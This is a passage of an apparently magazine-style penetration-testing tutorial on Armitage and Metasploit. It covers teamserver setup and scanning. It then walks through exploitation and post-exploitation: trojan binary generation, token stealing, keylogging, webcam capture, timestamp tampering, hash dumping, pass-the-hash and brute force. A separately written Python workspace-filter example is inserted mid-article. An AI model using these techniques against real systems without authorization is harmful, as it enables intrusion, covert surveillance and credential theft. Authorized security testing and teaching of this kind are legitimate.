            *) log_end_msg 1 ;; # Failed to start
        esac
        ;;
      *)
        # Failed to stop
        log_end_msg 1
        ;;
    esac
    ;;
  *)
    echo "Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}" >&2
    exit 3
    ;;
esac
Once that is done we are ready to get Armitage running. 

Configuring Armitage 

Before you can use Armitage you need to config- 
ure it and make sure it is running (and create start- 
up-scripts so it is always started when the system 
boots up). 

To begin with we need a shared secret (also known as a password) that is the gatekeeper between your Armitage server and its clients. Anyone who knows this password can access your server and access the results you have collected, including active sessions. Take care when choosing this password, although for this article I will choose a password that is not considered secure but is easy to read. 

Manually start Armitage Teamserver 

To manually start Armitage Teamserver you first need to move to the Armitage directory, which (in BackTrack 5 R3) is /opt/metasploit/msf3/data/armitage, by running: 

# cd /opt/metasploit/msf3/data/armitage 

And then to start the Armitage Teamserver you need to run ./teamserver <my-ip-address> <password> like this: 

# ./teamserver 172.16.109.130 MySecretPassword 

Creating start-up scripts for Armitage 

To start the Armitage Team Server for true multiplayer Metasploit you need to create a startup script. As of this moment the correct way to start an Armitage team server on BackTrack 5 R3 is like this: Listing 1. 

Start Armitage server automatically at boot 

Add the Armitage to automatically start at boot with 
the following command: 

# update-rc.d armitage-teamserver defaults 

Using Armitage 

Connecting Armitage client to the Server. 
Using Armitage GUI 

The Armitage GUI has three main panels: modules 
(top to the left), targets (top to the right) and tabs 
(bottom), which can be resized to your liking. 

Modules 

The module browser lets you launch a Metasploit 
auxiliary module, throw an exploit, generate a pay- 
load, and run a post-exploitation module. Click 
through the tree to find the desired module. Dou- 
ble-click the module to open a module launch dia- 
log. 

Armitage will configure the module to run against 
the selected hosts. This works for auxiliary mod- 
ules, exploits, and post modules. 

Running a module against multiple hosts is one 
of the big advantages of Armitage. In the Metasploit 
console, you must configure and launch an exploit 
and post modules for each host you're working 
with while in the Armitage GUI most of the module 
settings are already populated. 

You can search modules too. Click in the search 
box below the tree, type a wildcard expression 
(e.g., ssh_*), and press enter. The module tree will 
show the search results, expanded for quick view- 
ing. Clear the search box and press enter to re- 
store the module browser to its original state. 

Targets - Graph View 

The targets panel shows your targets to you. Armitage represents each target as a computer with its IP address and other information about it below the computer. The computer screen shows the operating system the computer is running (Figure 2). 

Figure 1. Armitage client connection window 

Figure 2. Description of the Armitage user interface 

A red computer with electrical jolts indicates a 
compromised host. 

A directional green line indicates a pivot from one 
host to another. Pivoting allows Metasploit to route 
attacks and scans through intermediate hosts. A 
bright green line indicates the pivot communication 
path is in use. 

Click a host to select it. You may select multiple 
hosts by clicking and dragging a box over the de- 
sired hosts. 

Right-click a host to bring up a menu with avail- 
able options. The attached menu will show attack 
and login options, menus for existing sessions, 
and options to edit the host information. 

The login menu is only available after a port scan 
reveals open ports that Metasploit can use. The 
Attack menu is only available after finding attacks 
through the Attacks menu at the top of Armitage. 
Shell and Meterpreter menus show up when a 
shell or Meterpreter session exists on the selected 
host. 

Several keyboard shortcuts are available in the 
targets panel. To edit these, go to Armitage -> Pref- 
erences. 

• Ctrl Plus - zoom in 

• Ctrl Minus - zoom out 

• Ctrl 0 - reset the zoom level 

• Ctrl A - select all hosts 

• Escape - clear selection 

• Ctrl C - arrange hosts into a circle 

• Ctrl S - arrange hosts into a stack 

• Ctrl H - arrange hosts into a hierarchy. This 
only works when a pivot is set up. 

• Ctrl P - export hosts into an image 

Right-click the target area with no selected hosts 
to configure the layout and zoom level of the tar- 
get area. 

Targets - Table View 

If you have a lot of hosts, the graph view becomes difficult to work with. For this situation Armitage has a table view. Go to Armitage -> Set Target View -> Table View to switch to this mode. Armitage will remember your preference (Figure 3). 

Figure 3. Your preferences stored in Armitage 

Click any of the table headers to sort the hosts. 
Highlight a row and right-click it to bring up a menu 
with options for that host. 

Armitage will highlight the IP address of any host 
with sessions. If a pivot is in use, Armitage will 
make it bold as well. 

Tabs 

Armitage opens each dialog, console, and table in 
a tab below the module and target panels. Click 
the X button to close a tab. 

You may right-click the X button to open a tab in 
a window, take a screenshot of a tab, or close all 
tabs with the same name (Figure 4). 

Hold shift and click X to close all tabs with the 
same name. Hold shift + control and click X to 
open the tab in its own window. 

You may drag and drop tabs to change their or- 
der. 

Armitage provides several keyboard shortcuts to 
make your tab management experience as enjoy- 
able as possible. Use Ctrl+T to take a screenshot 
of the active tab. Use Ctrl+D to close the active 
tab. Try Ctrl+Left and Ctrl+Right to quickly switch 
tabs. And Ctrl+W to open the current tab in its own 
window. 

Consoles 

Metasploit console, Meterpreter console, and shell 
interfaces each use a console tab. A console tab 
lets you interact with these interfaces through Ar- 
mitage. 

The console tab tracks your command history. 
Use the up arrow to cycle through previously typed 
commands. The down arrow moves back to the 
last command you typed. 

In the Metasploit console, use the Tab key to 
complete commands and parameters. This works 
just like the Metasploit console outside of Armit- 
age. 

Use Ctrl Plus to make the console font size larg- 
er, Ctrl Minus to make it smaller, and Ctrl 0 to re- 
set it. This change is local to the current console 
only. Visit Armitage -> Preferences to permanently 
change the font. 

Press Ctrl F to show a panel that will let you search for text within the console. 

Figure 4. Tabs management 

Use Ctrl A to select all text in the console's buffer. Armitage sends a use or a set PAYLOAD command if you click a module or a payload name in a console. 

To open a Console go to View -> Console or 
press Ctrl+N. 

On MacOS X and Windows, you must click in the 
edit box at the bottom of the console to type. Linux 
doesn't have this problem. Always remember, the 
best Armitage experience is on Linux. 

The Armitage console uses color to draw your attention to some information. To disable the colors, set the console.show_colors.boolean preference to false. You may also edit the colors through Armitage -> Preferences. Here is the Armitage color palette and the preference associated with each color: Figure 5. 

Logging 

Armitage logs all console, shell, and event log output for you. Armitage organizes these logs by date and host. You'll find these logs in the armitage folder. Go to View -> Reporting -> Activity Logs to open this folder. 

Armitage also saves copies of screenshots and webcam shots to this folder. 

Change the armitage.log_everything.boolean preference key to false to disable this feature. 

Edit the armitage.log_data_here.folder preference to set the folder where Armitage should log everything to. 
Export Data 

Armitage and Metasploit share a database to track 
your hosts, services, vulnerabilities, credentials, 
loots, and user-agent strings captured by browser 
exploit modules. 

To get this data, go to View -> Reporting -> Export 
Data. This option will export data from Metasploit 
and create easily parsable XML and tab separated 
value (TSV) files. 

Host Management 
Dynamic Workspaces 

Armitage's dynamic workspaces feature allows 
you to create views into the hosts' database and 
quickly switch between them. Use Workspaces 
-> Manage to manage your dynamic workspaces. 
Here you may add, edit and remove workspaces 
you create (Figure 6). 

To create a new dynamic workspace, press Add. 
You will see the following dialog: Figure 7. 

Give your dynamic workspace a name. It doesn't 
matter what you call it. This description is for you. 

If you'd like to limit your workspace to hosts from 
a certain network, type a network description in 
the Hosts field. A network description might be: 
10.10.0.0/16 to display hosts between 10.10.0.0- 
10.10.255.255. Separate multiple networks with a 
comma and a space. 
Figure 6. Managing your dynamic workspaces 

Figure 5. Armitage color palette 

Figure 7. Creating a new dynamic workspace 

You can cheat with the network descriptions a little. If you type 192.168.95.0, Armitage will assume you mean 192.168.95.0-255. If you type 192.168.0.0, Armitage will assume you mean 192.168.0.0-192.168.255.255. 

Fill out the Ports field to include hosts with cer- 
tain services. Separate multiple ports using a com- 
ma and a space. 

Use the OS field to specify which operating sys- 
tem you'd like to see in this workspace. You may 
type a partial name, such as "indows". Armitage 
will only include hosts whose OS name includes 
the partial name. This value is not case sensitive. 
Separate multiple operating systems with a com- 
ma and a space. 

Select Hosts with sessions only to only include 
hosts with sessions in this dynamic workspace. 

You may specify any combination of these items 
when you create your dynamic workspace. 

Each workspace will have an item in the Work- 
spaces menu. Use these menu items to switch 
between workspaces. You may also use Ctrl+1 
through Ctrl+9 to switch between your first nine 
workspaces. 

Use Workspaces -> Show All or Ctrl+Backspace 
to display the entire database. 

Armitage will only display 512 hosts at any given 
time, no matter how many hosts are in the data- 
base. If you have thousands of hosts, use this fea- 
ture to segment your hosts into useful target sets. 
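The dynamic workspace rules above (network descriptions with the trailing-zero shorthand, a ports list, a case-insensitive OS substring such as "indows", and hosts with sessions only) can be reproduced outside the GUI to check which hosts a given workspace would show. The following is an added example, not Armitage's own code; the host database is constructed, and it assumes that every trailing zero octet in a network description is a wildcard, which generalizes the two examples the text gives.

```python
"""Armitage-style dynamic workspace filter (added example, not Armitage code).

Reproduces the host-selection rules from the article: a network description
is either explicit CIDR ("10.10.0.0/16") or a dotted quad where trailing
zero octets are wildcards ("192.168.95.0" = /24, "192.168.0.0" = /16; the
same rule applied to three zeros, e.g. "10.0.0.0" = /8, is this example's
assumption). Ports, OS terms and networks are "comma and a space" lists.
"""
import ipaddress


def expand_network(desc):
    """Turn one network description into an ipaddress.ip_network."""
    desc = desc.strip()
    if "/" in desc:
        return ipaddress.ip_network(desc, strict=False)
    octets = desc.split(".")
    if len(octets) != 4:
        raise ValueError("bad network description: %r" % desc)
    zeros = 0                      # count trailing zero octets
    for octet in reversed(octets):
        if octet != "0":
            break
        zeros += 1
    prefix = 32 - 8 * zeros        # "192.168.95.0" -> /24, "192.168.1.7" -> /32
    return ipaddress.ip_network("%s/%d" % (desc, prefix), strict=False)


def parse_list(field):
    """Split a 'comma and a space' separated field; empty means no restriction."""
    return [x.strip() for x in field.split(",") if x.strip()] if field else []


class Workspace:
    """One dynamic workspace: any combination of the four filters."""

    def __init__(self, name, hosts="", ports="", os="", sessions_only=False):
        self.name = name
        self.networks = [expand_network(n) for n in parse_list(hosts)]
        self.ports = {int(p) for p in parse_list(ports)}
        self.os_terms = [t.lower() for t in parse_list(os)]   # not case sensitive
        self.sessions_only = sessions_only

    def matches(self, host):
        """host is a dict with keys ip, os, ports (set of ints), sessions (int)."""
        ip = ipaddress.ip_address(host["ip"])
        if self.networks and not any(ip in net for net in self.networks):
            return False
        if self.ports and not (self.ports & set(host["ports"])):
            return False
        if self.os_terms and not any(t in (host["os"] or "").lower()
                                     for t in self.os_terms):
            return False
        if self.sessions_only and host["sessions"] == 0:
            return False
        return True

    def select(self, hosts):
        """Return the IPs of the hosts this workspace would display."""
        return [h["ip"] for h in hosts if self.matches(h)]


# Constructed sample host database (placeholder addresses and OS strings)
HOSTS = [
    {"ip": "10.10.3.4",      "os": "Microsoft Windows 7",  "ports": {135, 445}, "sessions": 1},
    {"ip": "10.10.200.9",    "os": "Linux 2.6.X",          "ports": {22, 80},   "sessions": 0},
    {"ip": "192.168.95.17",  "os": "Microsoft Windows XP", "ports": {445},      "sessions": 0},
    {"ip": "192.168.96.5",   "os": "Windows Server 2008",  "ports": {80, 445},  "sessions": 2},
    {"ip": "172.16.109.130", "os": None,                   "ports": set(),      "sessions": 0},
]

if __name__ == "__main__":
    ws = Workspace("windows smb", hosts="10.10.0.0/16, 192.168.95.0",
                   ports="445", os="indows")
    print(ws.name, "->", ws.select(HOSTS))
    print("sessions only ->", Workspace("owned", sessions_only=True).select(HOSTS))
```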

Importing Hosts 

To add host information to Metasploit, you may im- 
port it. The Hosts -> Import Hosts menu accepts 
the following files: 

• Acunetix XML 

• Amap Log 

• Amap Log -m 

• Appscan XML 

• Burp Session XML 

• Foundstone XML 

• IP360 ASPL 

• IP360 XML v3 

• Microsoft Baseline Security Analyzer 

• Nessus NBE 

• Nessus XML (v1 and v2) 

• NetSparker XML 

• NeXpose Simple XML 

• NeXpose XML Report 

• Nmap XML 

• OpenVAS Report 

• Qualys Asset XML 

• Qualys Scan XML 

• Retina XML 



You may manually add hosts with Hosts -> Add 
Hosts. 

NMap Scans 

You may also launch an NMap scan from Armitage 
and automatically import the results into Metasploit. 
The Hosts ->NMap Scan menu has several scan- 
ning options. 

Optionally, you may type db_nmap in a console 
to launch NMap with the options you choose. 
NMap scans do not use the pivots you have set up. 

MSF Scans 

Armitage bundles several Metasploit scans into 
one feature called MSF Scans. This feature will 
scan for a handful of open ports. It then enumer- 
ates several common services using Metasploit 
auxiliary modules built for the purpose. 

Highlight one or more hosts, right-click, and click 
Scan to launch this feature. You may also go to 
Hosts -> MSF Scans to launch these as well. 

These scans work through a pivot and against 
IPv6 hosts as well. These scans do not attempt to 
discover if a host is alive before scanning. To save 
time, you should do host discovery first (e.g. an 
ARP scan, ping sweep, or DNS enumeration) and 
then launch these scans to enumerate the discov- 
ered hosts. 

DNS Enumeration 

Another host discovery option is to enumerate a 
DNS server. Go to Hosts -> DNS Enum to do this. 
Armitage will present a module launcher dialog 
with several options. You will need to set the DO- 
MAIN option to the domain you want to enumerate. 
You may also want to set NS to the IP address of 
the DNS server you're enumerating. 

If you're attacking an IPv6 network, DNS enu- 
meration is one option to discover the IPv6 hosts 
on the network. 

Database Maintenance 

Metasploit logs everything you do to a database. 
Over time your database will become full of stuff. 
If you have a performance problem with Armitage, 
try clearing your database. To do this, go to Hosts 
-> Clear Database. 

Exploitation 
Remote Exploits 

Before you can attack, you must choose your 
weapon. Armitage makes this process easy. Use 
Attacks -> Find Attacks to generate a custom At- 
tack menu for each host. To exploit a host: right- 
click it, navigate to Attack, and choose an exploit. 
To show the right attacks, make sure the operating system is set for the host. 

The Attack menu limits itself to exploits that meet 
a minimum exploit rank of great. Some useful ex- 
ploits are ranked good and they won't show in the 
attack menu. You can launch these using the mod- 
ule browser. 

Use Armitage -> Set Exploit Rank to change the 
minimum exploit rank. 

Optionally, if you'd like to see hosts that are vul- 
nerable to a certain exploit, browse to the exploit in 
the module browser. Right-click the module. Select 
Relevant Targets. Armitage will create a dynamic 
workspace that shows hosts that match the high- 
lighted exploit. Highlight all of the hosts and double- 
click the exploit module to attack all of them at once. 

Which exploit? 

Learning which exploits to use and when comes 
with experience. Some exploits in Metasploit im- 
plement a check function. These check functions 
connect to a host and check if the exploit applies. 
Armitage can use these check functions to help 
you choose the right exploit when there are many 
options. For example, targets listening on port 80 
will show several web application exploits after you 
use Find Attacks. Click the Check exploits menu 
to run the check command against each of these. 
Once all the checks are complete, press Ctrl F and 
search for vulnerable hosts. This will lead you to 
the right exploit (Figure 8). 

Clicking a host and selecting Services is another way to find an exploit. If you have NMap scan results, look at the information field and guess which server software is in use. Use the module browser to search for any Metasploit modules related to that software. One module may help you find information required by another exploit. Apache Tomcat is an example of this. The tomcat_mgr_login module will search for a username and password that you can use. Once you have this, you can launch the tomcat_mgr_deploy exploit to get a shell on the host. 

Launching Exploits 

Armitage uses this dialog to launch exploits: Fig- 
ure 9. 
The exploit launch dialog lets you configure options for a module and choose whether to use a reverse connect payload. 

Armitage presents options in a table. Double-click 
the value to edit it. If an option requires a filename, 
double-click the option to open up a file chooser di- 
alog. You may also check Show advanced options 
to view and set advanced options. 

If you see SOMETHING + in a table, this means 
you can double-click that item to launch a dialog to 
help you configure its value. This convention applies 
to the module launcher and preferences dialogs. 

Some penetration testers organize their targets 
into text files to make them easier to track. Armit- 
age can make use of these files too. Double-click 
RHOST + and select your targets file. The file must 
contain one IP address per line. This is an easy 
way to launch an attack or action against all of 
those hosts. 

For remote exploits, Armitage chooses your payload for you. Generally, Armitage will use Meterpreter for Windows targets and a command shell payload for UNIX targets. 

Click Launch to run the exploit. If the exploit is 
successful, Armitage will make the host red and 
surround it with lightning bolts. Metasploit will also 
print a message to any open consoles. 

Automatic Exploitation 

If manual exploitation fails, you have the hail mary 
option. Attacks -> Hail Mary launches this feature. 
Armitage's Hail Mary feature is a smart db_autop- 
wn. It finds exploits relevant to your targets, filters 
the exploits using known information, and then 
sorts them into an optimal order. 

This feature won't find every possible shell, but 
it's a good option if you don't know what else to try. 

Client-side Exploits 

Through Armitage, you may use Metasploit's client-side exploits. A client-side attack is one that attacks an application and not a remote service. If you can't get a remote exploit to work, you'll have to use a client-side attack. 

Figure 8. Finding the right exploit 

Figure 9. Launching exploits 

Use the module browser to find and launch client-side exploits. Search for fileformat to find exploits that trigger when a user opens a malicious file. Search for browser to find exploits that serve browser attacks from a web server built into Metasploit. 

Client-side Exploits and Payloads 

If you launch an individual client-side exploit, you
have the option of customizing the payload that
goes with it. Armitage picks sane defaults for you. 

In a penetration test, it's usually easy to get 
someone to run your evil package. The hard part is 
to get past network devices that limit outgoing traf- 
fic. For these situations, it helps to know about me- 
terpreter's payload communication options. There 
are payloads that speak HTTP, HTTPS, and even 
communicate to IPv6 hosts. These payloads give 
you options in a tough egress situation. 

To set the payload, double-click PAYLOAD in the 
option column of the module launcher. This will 
open a dialog asking you to choose a payload (Fig- 
ure 10). 

Highlight a payload and click Select. Armitage will
update the PAYLOAD, DisablePayloadHandler,
ExitOnSession, LHOST, and LPORT values for
you. You're welcome to edit these values as you
see fit. 

If you select the Start a handler for this pay- 
load option, Armitage will set the payload options 
to launch a payload handler when the exploit 
launches. If you did not select this value, you're 
responsible for setting up a multi/handler for the 
payload. 
Figure 10. Choosing a payload 



Payload Handlers 

A payload handler is a server that runs in Metasploit.
Its job is to wait for a payload to connect to your
Metasploit and establish a session. 

To quickly start a payload handler, navigate to 
Armitage -> Listeners. A bind listener attempts to 
connect to a payload listening for a connection. A 
reverse listener waits for the payload to connect 
back to you. 

You may set up shell listeners to receive connec- 
tions from netcat. 

Go to View -> Jobs to see which handlers are 
running. 

Generate a Payload 

Exploits are great, but don't ignore the simple stuff. 
If you can get a target to run a program, then all 
you need is an executable. Armitage can generate 
an executable from any of Metasploit's payloads. 
Choose a payload in the module browser, double- 
click it, select the type of output, and set your op- 
tions. Once you click launch, a save dialog will ask 
you where to save the file to (Figure 11). 

To create a Windows trojan binary, set the output 
type to exe. Set the Template option to a Windows 
executable. Set KeepTemplateWorking if you'd 
like the template executable to continue to work 
as normal. Make sure you test the resulting binary. 
Some template executables will not yield a work- 
ing executable. 

Remember, if you have a payload, it needs a
handler. Use the multi/handler output type to
create a handler that waits for the payload to
connect. This option offers more flexibility and
payload options than the Armitage -> Listeners
menu. 

If you plan to start a handler and then generate a
payload, here's a tip that will save you some time.
First, configure a multi/handler as described. Hold
down Shift when you click Launch. This will tell
Armitage to keep the module launch dialog open.
Once your handler is started, change the output
type to the desired value, and click Launch again.
This will generate the payload with the same
values used to create the multi/handler. 

Post Exploitation 
Managing Sessions 

Armitage makes it easy to manage the meterpreter 
agent once you successfully exploit a host. Hosts 
running a meterpreter payload will have a Meter- 
preter N menu for each Meterpreter session (Fig- 
ure 12). 

If you have shell access to a host, you will see 
a Shell N menu for each shell session. Right-click 
the host to access this menu. If you have a Win- 
dows shell session, you may go to Shell N -> Me- 
terpreter to upgrade the session to a Meterpreter 
session. If you have a UNIX shell, go to Shell N -> 
Upload to upload a file using the UNIX printf com- 
mand. 

Privilege Escalation 

Some exploits result in administrative access to 
the host. Other times, you need to escalate privi- 
leges yourself. To do this, use the Meterpreter N -> 
Access -> Escalate Privileges menu. This will high- 
light the privilege escalation modules in the mod- 
ule browser. 

Try the getsystem post module against Windows 
XP/2003 era hosts. 

Token Stealing 

Another privilege escalation option is token
stealing. When a user logs onto a Windows host, a
token is generated and acts like a temporary cookie
to save the user the trouble of retyping their
password when they try to access different
resources. Tokens persist until a reboot. You may
steal these tokens to assume the rights of that
user. 

Figure 12. Meterpreter menu 

To see which tokens are available to you, go to 
Meterpreter N -> Access -> Steal Token. Armitage 
will present a list of tokens to you. Click Steal To- 
ken to steal one. 

If you want to revert to your original token, press 
Revert to Self. The Get UID button shows your cur- 
rent user ID. 

Session Passing 

Once you exploit a host, duplicating your access 
should be a first priority. Meterpreter N -> Access 
-> Pass Session will inject meterpreter into mem- 
ory and execute it for you. By default this option is 
configured to call back to Armitage's default Meter- 
preter listener. Just click Launch. 

You may also use Pass Session to send Meter- 
preter to a friend. Set LPORT and LHOST to the 
values of their Meterpreter multi/handler. 

If your friend uses Armitage, have them type 
set in a Console tab and report the LHOST and 
LPORT values to you. These are the values for 
their default Meterpreter listener. 

File Browser 

Meterpreter gives you several options for explor- 
ing a host once you've exploited it. One of them is 
the file browser. This tool will let you upload, down- 
load, and delete files. Visit Meterpreter N -> Ex- 
plore -> Browse Files to access the File Browser. 

Right-click a file to download or delete it. If you 
want to delete a directory, make sure it's empty first. 

You may download entire folders or individu- 
al files. Go to View -> Downloads to access your 
downloaded files. 

If you have system privileges, you may modify
the file timestamps using the File Browser.
Right-click a file or directory and go to the
Timestamp menu. This feature works like a
clipboard. Use Get MACE Values to capture the
timestamps of the current file. Right-click another
file and use Set MACE Values to update the
timestamps of that file. 

Command Shell 

You can reach a command shell for a host through 
Meterpreter N -> Interact -> Command Shell. The 
Meterpreter shell is also available under the same 
parent menu. 

Navigating to the Meterpreter N menu for each 
action gets old fast. Right-click inside the Meter- 
preter shell window to see the Meterpreter N menu 
items right away. 
Close the command shell tab to kill the process
associated with the command shell. 

VNC 

To interact with a desktop on a target host, go to 
Meterpreter N -> Interact -> Desktop (VNC). This 
will stage a VNC server into the memory of the 
current process and tunnel the connection through 
Meterpreter. Armitage will provide you the details 
to connect a local VNC client to your target. 

Screenshots and Webcam Spying 

To grab a screenshot use Meterpreter N -> Explore 
-> Screenshot. There is a Webcam Shot option in 
the same location. This option snaps a frame from 
the user's webcam. 

Right-click a screenshot or webcam shot image
to change the zoom for the tab. This zoom
preference will stay, even if you refresh the image.
Click Refresh to update the screenshot or grab
another frame from the webcam. Click Watch (10s)
to automatically snap a picture every ten seconds. 

Process Management and Key Logging 

Go to Meterpreter N -> Explore -> Show Process- 
es to see a list of processes on your victim. Use Kill 
to kill the highlighted processes. 

Meterpreter runs in memory. It's possible to move 
Meterpreter from one process to another. This is 
called migration. Highlight a process and click Mi- 
grate to migrate to another process. Your session 
will have the permissions of that process. 

While in a process, it's also possible to see key- 
strokes from the vantage point of that process. 
Highlight a process and click Log Keystrokes to 
launch a module that migrates meterpreter and 
starts capturing keystrokes. If you key log from 
explorer.exe you will see all of the keys the user 
types on their desktop. 

If you choose to migrate a process for the pur- 
pose of key logging, you should duplicate your 
session first. If the process Meterpreter lives in 
closes, your session will go away. 

Post-exploitation Modules 

Metasploit has several post-exploitation mod- 
ules too. Navigate the post branch in the mod- 
ule browser. Double-click a module and Armitage 
will show a launch dialog. Armitage will populate 
the module's SESSION variable if a compromised 
host is highlighted. Each post-exploitation module 
will execute in its own tab and present its output 
to you there. 

To find out which post modules apply for a
session: right-click a compromised host and
navigate to Meterpreter N -> Explore -> Post
Modules or Shell N -> Post Modules. Clicking this
menu item will show all applicable post modules in
the module browser. 

Metasploit saves post-exploitation data into a 
Loot database. To view this data go to View -> Loot. 

You may highlight multiple hosts and Armit- 
age will attempt to run the selected post module 
against all of them. Armitage will open a new tab 
for the post module output of each session. This 
may lead to a lot of tabs. Hold down shift and click 
X on one of the tabs to close all tabs with the same 
name. 

Maneuver 
Pivoting 

Metasploit can launch attacks from a compromised 
host and receive sessions on the same host. This 
ability is called pivoting. 

To create a pivot, go to Meterpreter N -> Pivoting 
-> Setup.... A dialog will ask you to choose which 
subnet you want to pivot through the session. 

Once you've set up pivoting, Armitage will draw 
a green line from the pivot host to all targets reach- 
able by the pivot you created. The line will become 
bright green when the pivot is in use. 

To use a pivot host for a reverse connection, set 
the LHOST option in the exploit launch dialog to 
the IP address of the pivot host. 

Scanning and External Tools 

Once you've accessed a host, it's good to explore
and see what else is on the same network. If
you've set up pivoting, Metasploit will tunnel TCP
connections to eligible hosts through the pivot
host. These connections must come from
Metasploit. 

To find hosts on the same network as a
compromised host, right-click the compromised
host and go to Meterpreter N -> ARP Scan or Ping
Sweep. This will show you which hosts are alive.
Highlight the hosts that appear, right-click, and
select Scan to scan these hosts using Armitage's
MSF Scan feature. These scans will honor the pivot
you set up. 

External tools (e.g., nmap) will not use the pivots 
you've set up. You may use your pivots with exter- 
nal tools through a SOCKS proxy though. Go to 
Armitage -> SOCKS Proxy... to launch the SOCKS 
proxy server. 

The SOCKS4 proxy server is one of the most
useful features in Metasploit. Launch this option
and you can set up your web browser to connect
to websites through Metasploit. This allows you to
browse internal sites on a network like you're
local. You may also configure proxychains on
Linux to use almost any program through a proxy
pivot. 

Password Hashes 

To collect Windows password hashes, visit
Meterpreter N -> Access -> Dump Hashes. You
need administrative privileges to do this. 

There are two hash dumping options. One is the
lsass method and the other is the registry method.
The lsass method attempts to grab the password
hashes from memory. This option works well
against Windows XP/2003 era hosts. The registry
method works well against modern Windows
systems. 

You may view collected hashes through View -> 
Credentials. For your cracking pleasure, the Ex- 
port button in this tab will export credentials in pw- 
dump format. You may also use the Crack Pass- 
words button to run John the Ripper against the 
hashes in the credentials database. 

Pass-the-Hash 

When you login to a Windows host, your password 
is hashed and compared to a stored hash of your 
password. If they match, you're in. When you at- 
tempt to access a resource on the same Windows 
domain, the stored hash is sent to the other host 
and used to authenticate you. With access to these 
hashes, you can use this mechanism to take over 
other hosts on the same domain. This is called a 
pass-the-hash attack. 

Use Login -> psexec to attempt a pass-the-hash 
attack against another Windows host. Click Check 
all Credentials to have Armitage try all hashes and 
credentials against the host. 

The pass-the-hash attack attempts to upload a 
file and create a service that immediately runs. 
Only administrator users can do this. Further, your 
targets must be on the same active directory do- 
main for this attack to work. 

Using Credentials 

Armitage will create a Login menu on each host
with known services. Right-click a host and
navigate to Login -> service. This will open a
dialog where you may choose a username and
password from the credentials known to
Metasploit. 

Some services (e.g. telnet and ssh) will give you 
a session when a login succeeds. Others will not. 

Check the Try all credentials option and 
Metasploit will login to the service with each of the 
known credentials. Metasploit automatically adds 
each successful login to the credentials table for 
you. 

The best way into a network is through valid
credentials. Remember that a successful
username/password combination from one service
may give you access to another host that you
couldn't exploit. 

Password Brute Force 

Metasploit can attempt to guess a username and 
password for a service for you. This capability is 
easy to use through the module browser. 

Metasploit supports brute forcing through the
auxiliary modules named service_login. Type login
in the module browser to search for them. 

To brute force a username and password over 
SSH, browse to auxiliary/scanner/ssh/ssh_login in 
the modules panel and double-click it. 

If you know the username, set the USERNAME 
variable. If you'd like Metasploit to brute force the 
username, select a value for USER_FILE. Dou- 
ble-click the USER_FILE variable to bring up a file 
chooser where you can select a text file containing 
a list of usernames. 

Metasploit has many files related to brute forcing
in the [metasploit install]/data/wordlists directory. 

Set the PASS_FILE variable to a text file contain- 
ing a list of passwords to try. 

If you're only brute forcing one host and you have 
a lot of usernames/passwords to try, I recommend 
using an external tool like Hydra. Metasploit does 
not make several parallel connections to a single 
host to speed up the process. This lesson can be 
taken one step further - use the right tool for each 
job. 

Remote Metasploit 
Remote Connections 

You can use Armitage to connect to an existing
Metasploit instance on another host. Working with
a remote Metasploit instance is similar to working
with a local instance. Some Armitage features
require read and write access to local files to
work. Armitage's deconfliction server adds these
features and makes it possible for Armitage clients
to use Metasploit remotely. 

Connecting to a remote Metasploit requires
starting a Metasploit RPC server and Armitage's
deconfliction server. With these two servers set up,
your use of Metasploit will look like this diagram:
Figure 13. 

Figure 13. Your usage of Metasploit with Metasploit RPC
server and Armitage's deconfliction server 

Multi-Player Metasploit Setup 

The Armitage Linux package comes with a team- 
server script that you may use to start Metasploit's 
RPC daemon and Armitage's deconfliction server 
with one command. To run it: 

cd /path/to/metasploit/msf3/data/armitage
./teamserver [external IP address] [password] 

This script assumes armitage.jar is in the cur- 
rent folder. Make sure the external IP address is 
correct (Armitage doesn't check it) and that your 
team can reach port 55553 on your attack host. 
That's it. 

Metasploit's RPC daemon and the Armitage de- 
confliction server are not GUI programs. You may 
run these over SSH. 

The Armitage team server communicates over 
SSL. When you start the team server, it will pres- 
ent a server fingerprint. This is a SHA-1 hash of the 
server's SSL certificate. When your team members 
connect, Armitage will present the hash of the cer- 
tificate the server presented to them. They should 
verify that these hashes match. 

Do not connect to 127.0.0.1 when a teamserver
is running. Armitage uses the IP address you're
connecting to in order to determine whether it
should use SSL (teamserver, remote address) or
non-SSL (msfrpcd, localhost). To connect Armitage
to your teamserver locally, use the [external IP
address] in the Host field. 

Armitage's red team collaboration setup is CPU
sensitive and it likes RAM. Make sure you have
1.5GB of RAM in your team server. 



Multi-Player Metasploit 

Armitage's red team collaboration mode adds a 
few new features. These are described here: 

View -> Event Log opens a shared event log. 
You may type into this log and communicate as 
if you're using an IRC chat room. In a penetration 
test this event log will help you reconstruct major 
events (Figure 14). 

Multiple users may use any Meterpreter ses- 
sion at the same time. Each user may open one 
or more command shells, browse files, and take 
screenshots of the compromised host. 

Metasploit shell sessions are automatically 
locked and unlocked when in use. If another user 
is interacting with a shell, Armitage will warn you 
that it's in use. 

Some Metasploit modules require you to spec- 
ify one or more files. If a file option has a + next 
to it, then you may double-click that option name 
to choose a local file to use. Armitage will upload 
the chosen local file and set the option to its re- 
mote location for you. Generally, Armitage will do 
its best to move files between you and the shared 
Metasploit server to create the illusion that you're 
using Metasploit locally. 

Penetration testers will find this feature invalu- 
able. Imagine you're working on a pen test and 
come across a system you don't know much 
about. You can reach back to your company and 
ask your local expert to load Armitage and con- 
nect to the same Metasploit instance. They will 
immediately have access to your scan data and 
they can interact with your existing sessions... 
seamlessly. 

Or, imagine that you're simulating a phishing
attack and you get access to a host. Your whole
team can now work on the same host. One person
can search for data, another can set up a pivot
and search for internal hosts to attack, and
another can work on persistence. The sky is the
limit here. 

Some meterpreter commands may have short- 
ened output. Multi-player Armitage takes the initial 
output from a command and delivers it to the cli- 
ent that sent the command. Additional output is ig- 
nored (although the command still executes nor- 
mally). This limitation primarily affects long running 
meterpreter scripts. 

Scripting Armitage 
Cortana 

Armitage includes Cortana, a scripting technology
developed through DARPA's Cyber Fast Track
program. With Cortana, you may write red team
bots and extend Armitage with new features. You
may also make use of scripts written by others. 

Cortana is based on Sleep, an extensible Perl- 
like language. Cortana scripts have a .cna suffix. 

Read the Cortana Tutorial to learn more about 
how to develop bots and extend Armitage (Figure 
15). 

Stand-alone Bots 

A stand-alone version of Cortana is distributed with 
Armitage. You may connect the stand-alone Cor- 
tana interpreter to an Armitage team server. 

Here's a helloworld.cna Cortana script: 

on ready { println("Hello World!"); quit(); } 

To run this script, you will need to start Cortana.
First, stand-alone Cortana must connect to a team
server. The team server is required because
Cortana bots are another red team member. If you
want to connect multiple users to Metasploit, you
have to start a team server. 

Figure 15. The Cortana Tutorial 

Resources 
